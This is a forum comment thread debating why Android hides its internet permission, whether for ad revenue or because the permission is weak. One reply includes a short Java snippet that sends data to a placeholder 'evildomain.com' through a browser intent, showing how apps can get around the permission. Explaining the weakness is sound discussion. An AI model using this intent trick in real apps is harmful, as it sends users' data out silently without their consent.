← Back to context

Comment by kllrnohj

21 days ago

> But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.

The internet permission has nothing to do with ads? It's a hidden permission because:

1) Internet connection is so ubiquitous as to just be noise if displayed

2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar

25 comments

kllrnohj

Reply
tgsovlerkhgsel  21 days ago

It absolutely has to do with ads. While there are various ways to exfiltrate small amounts of data, the non-collaborative ones are rarely silent and most importantly, they won't let the app get responses (e.g. ads) back.

The main thing this permission would be used for would be blocking ads. Also distinguishing shitty apps that are full of ads from those that aren't. If there is a calculator that needs Internet and one that doesn't, which one are you going to use?

  • kllrnohj  21 days ago

    > The main thing this permission would be used for would be blocking ads.

    This permission has existed for longer than runtime permissions. You have never been able to revoke it, it was just something you agreed to when you installed the app or you didn't install the app.

    It was "removed" in that era because if every app requests the same permission, then nobody cares about it anymore. When every app asks for the same thing, users stop paying attention to it. So no, it had fuck all to do with ads because that was never a thing in the first place. And ad blocking doesn't require this permission, either.

    > Also distinguishing shitty apps that are full of ads from those that aren't. If there is a calculator that needs Internet and one that doesn't, which one are you going to use?

    You can still use it for this. Apps are required to declare the permission still, it's listed on the Play Store under the "permissions" section. Similarly the OS reports the same thing. Presumably F-droid or whatever else also has a list of permissions before you install, and it'll be listed there.

    Although Google's own Calculator app requires Internet permission. Take that for what's it worth.

87636899376  21 days ago

> 1) Internet connection is so ubiquitous as to just be noise if displayed

That doesn't make it any less useful.

> 2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar

I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it. But even if it is flawed, don't you think Google would be a bit more incentivized to make the Internet permission work as expected if people could disable it?

  • UncleMeat  21 days ago

    > I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it.

       Uri uri = Uri.parse("https://evildomain.com/upload?data=DATA_GOES_HERE);
   Intent i = new Intent(Intent.ACTION_VIEW, uri);
   startActivity(i);

    Happily uses the browser app to do the data send for you. Requiring apps to have all the permissions of the recipient of an Intent before being allowed to send it would be a catastrophic change to the ecosystem.

    • noname120  20 days ago

      I don’t see why you couldn’t disallow opening URL intents. App intents that enable to exfiltrate data should be cracked down on by Google, it’s basically a privilege escalation.

      1 reply →

    • sterlind  21 days ago

      so? pop up a permission prompt. have the user confirm.

      and isn't it immediately apparent that the app is leaking data if your calculator is popping a webview?

      4 replies →

zrobotics  21 days ago

I mean, I just did a quick look over the installed apps on this phone and ~1/4 of them would work perfectly well without an internet connection, things like a level or GPS speedometer that use the phone sensor or apps for Bluetooth control of devices [like 0] . Why would something like a bubble level app need internet access for anything besides telemetry or ads? I realize I have way more of these types of apps than the average user, but apps like this aren't a super-niche thing that would be on 0.1% of devices.

I just tend to give Google little benefit of the doubt here, considering where their revenue comes from. Same as when they introduced manifest v3, ostensibly for security but just conveniently happening to neuter adblocking. Disabling access to the internet permission for apps aligns with their profit motive.

  • kllrnohj  21 days ago

    There's plenty of actually problematic stuff Google does (like this change in the article), there's no need to make up whack ass conspiracy theories, too.

    • ycombinatrix  21 days ago

      The internet permission is the only regular manifest permission you can't toggle in the settings. It is an obvious win for an advertising/surveillance company like Google. What is wack about it?

      2 replies →

    • zrobotics  21 days ago

      Huh? Not sure how this qualifies as "whack ass". There's an internet permission built in to the OS that Google chose to not expose to the user. The parent poster was claiming there is no reason anyone would want that permission, I then pointed out a whole category of apps that don't need internet to function for anything besides ads and telemetry. All of this is factual info.

      So rather than just dismissing the argument via insulting language, can you provide a reasonable alternative explanation for why this setting isn't exposed to the user?

      3 replies →

    • const_cast  20 days ago

      Google relies on ad money is a conspiracy? ... isn't that just... their business model? Like actually?

      I mean, would you chop off your own foot? No? Then we should all be in agreeance. Google is definitely forcing network permission for every app to maximize their ad revenue.